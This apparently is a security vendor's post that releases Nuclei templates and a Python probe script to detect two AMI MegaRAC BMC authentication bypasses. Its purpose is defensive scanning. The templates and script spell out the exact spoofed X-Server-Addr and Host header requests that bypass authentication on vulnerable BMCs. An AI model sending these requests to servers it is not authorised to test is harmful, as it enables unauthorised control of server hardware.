An attacker armed with the latest knowledge of BMC vulnerabilities and exploits is poised to take control of your server(s). Given that one of these vulnerabilities, CVE-2024-54085, was recently added to the CISA KEV, we now know exploitation is happening in the wild. Organizations must inventory IT assets and then determine if a given vulnerability is present. Due to the high severity (CVSS 10.0) and active exploitation of CVE-2024-54085, we are releasing Nuclei templates to help with vulnerability discovery.
Using the open-source scanner Nuclei (from ProjectDiscovery), you can use the templates below to test your AMI MegaRAC systems for both CVE-2024-54085 and CVE-2023-34329 (a similar vulnerability we disclosed previously).
Both templates test for the vulnerability by sending a series of three HTTP GET requests to the Redfish API: an unauthenticated request to the service root (/redfish/v1) to fingerprint the BMC as AMI MegaRAC, a baseline request to /redfish/v1/Systems that a healthy BMC must reject without credentials, and the same request again with a spoofed header. A target is flagged only if the baseline request is rejected and the spoofed request succeeds, so the check exercises the bypass itself rather than guessing from a banner. Keep in mind that OEMs have built AMI MegaRAC into many different BMC products, so be sure to test all of your IT infrastructure assets, especially the network segments containing the BMCs (which you are segmenting and not exposing to the Internet, we hope!). Because each OEM may apply its own version numbering to its MegaRAC build, detection based on version strings is unreliable. The Nuclei templates below test the BMC's actual behavior and therefore work regardless of OEM customizations to versioning.
CVE-2024-54085 – AMI MegaRAC Authentication Bypass
id: CVE-2024-54085

info:
  name: BMC&C v3 - Authentication Bypass
  author: Vlad Babkin
  severity: critical
  description: |
    AMI MegaRAC Redfish authentication bypass via a spoofed X-Server-Addr header
  reference:
    - https://eclypsium.com/blog/ami-megarac-vulnerabilities-bmc-part-3/
    - https://nvd.nist.gov/vuln/detail/CVE-2024-54085
  metadata:
    verified: true
    max-requests: 3
  tags: cve,cve2024,ami,megarac,kev

http:
  - raw:
      # 1. Service root: unauthenticated on every Redfish implementation; used to fingerprint AMI
      - |
        GET /redfish/v1 HTTP/1.1
        Host: {{Hostname}}
      # 2. Baseline: /redfish/v1/Systems must be rejected (non-200) without credentials
      - |
        GET /redfish/v1/Systems HTTP/1.1
        Host: {{Hostname}}
      # 3. Bypass attempt: same request with the spoofed header (the trailing colon is intentional)
      - |
        GET /redfish/v1/Systems HTTP/1.1
        Host: {{Hostname}}
        X-Server-Addr: 169.254.0.17:

    # Match only when the baseline is rejected, the spoofed request succeeds, and the service root identifies AMI
    matchers:
      - type: dsl
        dsl:
          - 'status_code_1 == 200 && status_code_2 != 200 && status_code_3 == 200 && (contains(body_1, "\"Vendor\":\"AMI\"") || contains(all_headers_1, "AMI MegaRAC Redfish Service"))'
        condition: and
CVE-2023-34329 – AMI MegaRAC Authentication Bypass
The Nuclei template below checks for the previously disclosed authentication bypass. The significant difference between this check and the one above is the header used in the final GET request: CVE-2024-54085 adds an X-Server-Addr header, whereas CVE-2023-34329 spoofs the Host header itself with the link-local address 169.254.0.17, which the BMC's web server treats as a trusted internal interface.
id: CVE-2023-34329

info:
  name: BMC&C v2 - Authentication Bypass
  author: Vlad Babkin
  severity: critical
  description: |
    AMI MegaRAC Redfish authentication bypass via a spoofed Host header
  reference:
    - https://eclypsium.com/research/bmcc-lights-out-forever/
    - https://nvd.nist.gov/vuln/detail/CVE-2023-34329
  metadata:
    verified: true
    max-requests: 3
  tags: cve,cve2023,ami,megarac

http:
  - raw:
      # 1. Service root: unauthenticated; used to fingerprint AMI
      - |
        GET /redfish/v1 HTTP/1.1
        Host: {{Hostname}}
      # 2. Baseline: /redfish/v1/Systems must be rejected (non-200) without credentials
      - |
        GET /redfish/v1/Systems HTTP/1.1
        Host: {{Hostname}}
      # 3. Bypass attempt: Host header replaced with the BMC's internal link-local address
      - |
        GET /redfish/v1/Systems HTTP/1.1
        Host: 169.254.0.17

    matchers:
      - type: dsl
        dsl:
          - 'status_code_1 == 200 && status_code_2 != 200 && status_code_3 == 200 && (contains(body_1, "\"Vendor\":\"AMI\"") || contains(all_headers_1, "AMI MegaRAC Redfish Service"))'
        condition: and
Scanning Systems
You can save each of the Nuclei templates above to its own file (e.g., CVE-2024-54085.yaml) and run Nuclei as follows to scan a target. Because these templates are not signed by ProjectDiscovery, Nuclei prints the "unsigned templates" warning shown below; that is expected.

$ nuclei -u https://[TARGET] -t CVE-2024-54085.yaml

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.4.7

                projectdiscovery.io

[INF] Current nuclei version: v3.4.7 (latest)
[INF] Current nuclei-templates version: v10.2.4 (latest)
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 67
[INF] Templates loaded for current scan: 1
[WRN] Loading 1 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[CVE-2024-54085] [http] [critical] https://[TARGET]/redfish/v1/Systems
[INF] Scan completed in 7.950308209s. 1 matches found.

Nuclei can also scan a target list from a file using the -l flag and write the results to a JSON file using the -je flag. Pass -t once per template (e.g., -t CVE-2024-54085.yaml -t CVE-2023-34329.yaml) to check for both issues in a single run. A match means an unauthenticated request to /redfish/v1/Systems succeeded from your scanner's vantage point, so treat it as confirmed rather than suspected exposure.
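For jump hosts or BMC management networks where Nuclei cannot be installed, the same three-request logic is easy to reproduce with the Python standard library. The script below is an added example written for this article, not Eclypsium's or ProjectDiscovery's code: probe() issues the identical GETs and applies the same "baseline rejected, spoofed request accepted, service root identifies AMI" rule as the templates for both CVEs. FakeMegaRAC is a constructed test fixture that mimics only the header handling the two bugs depend on (it trusts a leading "169.254.0.17:" in X-Server-Addr and a Host of 169.254.0.17); it is an assumption for offline demonstration, not a model of real MegaRAC firmware.

```python
"""Stand-alone re-implementation of the three-GET probe from the Nuclei templates.
Added example; FakeMegaRAC is a constructed fixture, not real firmware behavior."""
import http.client
import json
import ssl
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import urlparse

# Header each CVE's final request adds; values are copied from the templates.
BYPASS_HEADERS = {
    "CVE-2024-54085": {"X-Server-Addr": "169.254.0.17:"},  # trailing colon is intentional
    "CVE-2023-34329": {"Host": "169.254.0.17"},            # spoofed Host header
}


def _get(host, port, path, headers=None, use_tls=False, timeout=10):
    """One GET; returns (status, lower-cased header dict, body text)."""
    if use_tls:
        ctx = ssl.create_default_context()
        ctx.check_hostname = False
        ctx.verify_mode = ssl.CERT_NONE  # BMCs almost always present self-signed certs
        conn = http.client.HTTPSConnection(host, port, timeout=timeout, context=ctx)
    else:
        conn = http.client.HTTPConnection(host, port, timeout=timeout)
    try:
        # http.client omits its own Host header when the caller supplies one,
        # which is what the CVE-2023-34329 request relies on.
        conn.request("GET", path, headers=headers or {})
        resp = conn.getresponse()
        body = resp.read().decode("utf-8", "replace")
        return resp.status, {k.lower(): v for k, v in resp.getheaders()}, body
    finally:
        conn.close()


def looks_like_megarac(headers, body):
    """Same fingerprint as the templates' matcher, plus a parsed-JSON fallback
    so a pretty-printed service root ("Vendor": "AMI") is not missed."""
    if '"Vendor":"AMI"' in body or "AMI MegaRAC Redfish Service" in " ".join(headers.values()):
        return True
    try:
        return json.loads(body).get("Vendor") == "AMI"
    except (ValueError, AttributeError):
        return False


def probe(host, port, use_tls=False):
    """Run the probe; returns the fingerprint, the auth baseline and one bool per CVE."""
    s1, h1, b1 = _get(host, port, "/redfish/v1", use_tls=use_tls)
    s2, _, _ = _get(host, port, "/redfish/v1/Systems", use_tls=use_tls)
    result = {"megarac": s1 == 200 and looks_like_megarac(h1, b1),
              "auth_enforced": s2 != 200}  # 200 here means auth is off; a bypass result is meaningless
    for cve, extra in BYPASS_HEADERS.items():
        s3, _, _ = _get(host, port, "/redfish/v1/Systems", headers=extra, use_tls=use_tls)
        result[cve] = result["megarac"] and result["auth_enforced"] and s3 == 200
    return result


def probe_url(url):
    """Accept the same https://[TARGET] form the nuclei command line uses."""
    u = urlparse(url)
    tls = u.scheme == "https"
    return probe(u.hostname, u.port or (443 if tls else 80), use_tls=tls)


class FakeMegaRAC(BaseHTTPRequestHandler):
    """Constructed fixture: trusts the two spoofable headers the way the real bugs did."""
    vulnerable = {"CVE-2024-54085": True, "CVE-2023-34329": True}

    def do_GET(self):
        if self.path == "/redfish/v1":  # service root is always unauthenticated
            root = {"@odata.id": "/redfish/v1", "Vendor": "AMI", "Product": "MegaRAC Redfish Service"}
            return self._reply(200, json.dumps(root, separators=(",", ":")))
        trusted = (
            (self.vulnerable["CVE-2024-54085"]
             and self.headers.get("X-Server-Addr", "").startswith("169.254.0.17:"))
            or (self.vulnerable["CVE-2023-34329"] and self.headers.get("Host") == "169.254.0.17")
        )
        if trusted or self.headers.get("Authorization"):
            return self._reply(200, '{"Members":[]}')
        self._reply(401, '{"error":"Unauthorized"}')

    def _reply(self, code, body):
        data = body.encode()
        self.send_response(code)
        self.send_header("Content-Type", "application/json")
        self.send_header("Content-Length", str(len(data)))
        self.end_headers()
        self.wfile.write(data)

    def log_message(self, *args):  # keep the fixture quiet
        pass


def run_fake_bmc(vulnerable):
    """Start the fixture on an ephemeral 127.0.0.1 port; returns (server, port)."""
    handler = type("Fixture", (FakeMegaRAC,), {"vulnerable": dict(vulnerable)})
    srv = HTTPServer(("127.0.0.1", 0), handler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv, srv.server_address[1]


if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:  # python probe.py https://[TARGET]
        print(json.dumps(probe_url(sys.argv[1]), indent=2))
    else:                  # no target given: demonstrate against the fixture
        srv, port = run_fake_bmc({"CVE-2024-54085": True, "CVE-2023-34329": False})
        print(json.dumps(probe("127.0.0.1", port), indent=2))
        srv.shutdown()
```

Run it with a target URL to probe a real BMC, or with no arguments to see the logic exercised against the fixture, which is configured to be vulnerable to CVE-2024-54085 only. The auth_enforced field is worth watching in either case: a BMC that returns 200 for the baseline request has authentication disabled outright, which is a finding in its own right even though neither CVE check can fire.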
Note: For existing Eclypsium customers, this functionality is included in the product.
Resources
- 2022: BMC&C Part 1 – Multiple AMI MegaRAC vulnerabilities including arbitrary code execution via Redfish API and default credentials for root shell access
- 2023: BMC&C Part 2 – Authentication bypass via HTTP header spoofing and code injection through the Dynamic Redfish Extension interface
- 2025: BMC&C Part 3 – CVE-2024-54085, the remotely exploitable authentication bypass that finally made it onto CISA’s most critical list
- A Historic First: BMC Vulnerability CVE-2024-54085 Joins CISA’s Most Critical List